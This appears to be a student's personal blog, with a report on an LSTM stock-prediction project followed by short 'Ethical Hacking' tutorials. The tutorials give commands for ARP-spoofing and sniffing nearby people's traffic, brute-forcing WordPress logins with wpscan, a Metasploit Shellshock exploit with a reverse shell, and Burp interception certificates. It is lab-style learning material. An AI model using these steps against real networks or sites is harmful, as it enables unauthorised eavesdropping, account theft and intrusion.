About Arnold

Greetings! Welcome to my blog. Feel free to explore.

Intelligent Systems Blog Report

Introduction

For our final project our team consisting of Asoka, Arnold & Nixon decided to create a program which predicts how the stock market would move. We decided to create after throwing away many ideas. We coded this using python, matplotlib, numpy, pandas, scipy, dotenv, keras, tensorflow, and alpha-vantage.

Weekly Report

On the first week of the announcement of the final project we planned and thought about a topic/program we wanted to create for the project. Initially, we brainstormed the idea and had options on stock market prediction, image recognition, etc. But we decided on stock market prediction because it has more value to people of our age and we feel like we could use it after the stock market.

The following week after we started to work on our final project researching how the stock market works and what we needed to successfully make the program run. We researched on what algorithms best suit stock market algorithm.  

And on the third week we started the coding process on creating this program, we decided on using LSTM algorithm to predict the stock market. We also needed to take all the data of the stock market so we used an online API called AlphaVantage. The data provided in the API has a few classifications and we chose to use intraday data which is the data per minute in the stock market for more detail.

For the fourth week and so on we tried to improve our program giving it some more data to make it more accurate, we also added in some technical indicators such as RSI, MACD and Bollinger Bands to make it more accurate.

Conclusion

The program we created was intended for personal use, and the results were not always good on every stock symbol but we tried to feed it more data to further improve the results.

Ethical Hacking #12 : Eavesdropping using tcpdump

Eavesdropping is useful to find information about your surrounding peoples. This post is intended only for educational purposes.

To try, do the following commands :
echo 1 > /proc/sys/net/ipv4/ip_forward

Find your ip by typing :
ifconfig

Then run the first step using the command :
arpspoof -t your.ip.address target.ip.address

To listen on the packets gained, use this command :
tcpdump -vv src 172.20.10.12 -w foldername/fileoutputname.pcap

The output will be on the file you specified.

Ethical Hacking #11 : Burpsuite to create SSL

To start, we need these commands to create the certificate.
openssl req -x509 -days 730 -nodes - newkey rsa:2048 outform der -keyout server.key -out ca.der

After that code, it will require you to put in information on the certificate. Then after completing it, run these codes to finish the certificate.
openssl rsa -in server.key -inform pem -out server.key.der -outform der
openssl pkcs8 -topk8 -in server.key.der -inform der - out server.key.pkcs8.der -outform der -nocrypt

After making the certificate, open burpsuite and import the certificate.

Then after, you will need to configure the proxy to the desired IP that is running burpsuite.

Ethical Hacking #10 : Maltego

Information Gathering is a vital part in penetration testing. Maltego is a powerful tool to find out more information about the target and it is already provided in Kali so it can directly be used after registering at paterva.

To use maltego, open the app in Kali.

Drag the domain entity in maltego and right-click and choose all transforms.

It will provide you with all the relations within the domain.

 

Ethical Hacking #9 : Password cracking with wpscan

Wpscan is a powerful tool. In the previous post, we tried using wpscan to enumerate user, but we can also use wpscan to crack the password automatically based on a password list.

In kali, there is a preset password list that comes up after the installation located in /usr/share/wordlists/rockyou.txt

To use wpscan, just type the following command :
wpscan -U INSERT_USERNAME --url INSERT_TARGET_URL -P /usr/share/wordlists/rockyou.txt.

Then when we found the password, it will stop the process and tell you the password. If the process is done, it will stop when the password list is finished.

Ethical Hacking #8 : Metasploit

First of all, I changed the network to NatNetwork so that the 2 OS has different IPs.

Then proceed to use ifconfig to find both IPs.

 

Exploited OS

Kali

After knowing the IP, open Metasploit console to use the CVE exploits and use the CVE code using the ‘use exploit/multi/http/apache_mod_cgi_bash_env_exec’.

After choosing the target, I needed to complete the data to pull off the exploit. So I need to set the RHOSTS to the IP address, set the TARGETURI to cgi-bin/status and set PAYLOAD to linux/x86/shell_reverse_tcp.

Then all we have to do is type ‘exploit’ and I am inside.

Ethical Hacking #6 : Whois and host

Footprinting is a method of gathering information and is a vital step in penetration testing. Information is critical in doing penetration testing, whois and host are good commands when they are executed.

To use whois, just type in your terminal :
whois example.com
To use host, just type in your terminal :
host example.com

The information will be directly displayed when the site exists.